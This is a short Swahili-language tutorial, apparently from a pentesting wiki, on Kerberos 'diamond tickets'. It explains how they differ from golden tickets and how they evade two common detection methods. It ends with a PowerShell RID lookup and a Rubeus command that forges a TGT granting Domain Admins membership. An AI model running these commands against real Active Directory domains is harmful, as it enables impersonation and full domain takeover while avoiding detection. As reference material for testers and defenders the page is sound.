Tiketi ya Almasi

Kama tiketi ya dhahabu, tiketi ya almasi ni TGT ambayo inaweza kutumika kufikia huduma yoyote kama mtumiaji yeyote. Tiketi ya dhahabu inatengenezwa kabisa nje ya mtandao, imefichwa kwa kutumia hash ya krbtgt ya kikoa hicho, na kisha inapitishwa kwenye kikao cha kuingia ili kutumika. Kwa sababu watumiaji wa kikoa hawafuatilii TGTs ambazo wamezitoa kwa halali, wataikubali kwa furaha TGTs ambazo zimefichwa na hash yao ya krbtgt.

Kuna njia mbili za kawaida za kugundua matumizi ya tiketi za dhahabu:

• Tafuta TGS-REQs ambazo hazina AS-REQ inayolingana.

• Tafuta TGTs ambazo zina thamani za kipumbavu, kama vile muda wa maisha wa miaka 10 wa chaguo-msingi wa Mimikatz.

Tiketi ya almasi inatengenezwa kwa kubadilisha sehemu za TGT halali ambayo ilitolewa na DC. Hii inafanikiwa kwa kuomba TGT, kuidondosha na hash ya krbtgt ya kikoa, kubadilisha sehemu zinazohitajika za tiketi, kisha kuifichua tena. Hii inaondoa kasoro mbili zilizotajwa hapo juu za tiketi ya dhahabu kwa sababu:

• TGS-REQs zitakuwa na AS-REQ inayotangulia.

• TGT ilitolewa na DC ambayo inamaanisha itakuwa na maelezo sahihi yote kutoka kwa sera ya Kerberos ya kikoa. Ingawa haya yanaweza kughushiwa kwa usahihi katika tiketi ya dhahabu, ni ngumu zaidi na inaweza kusababisha makosa.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.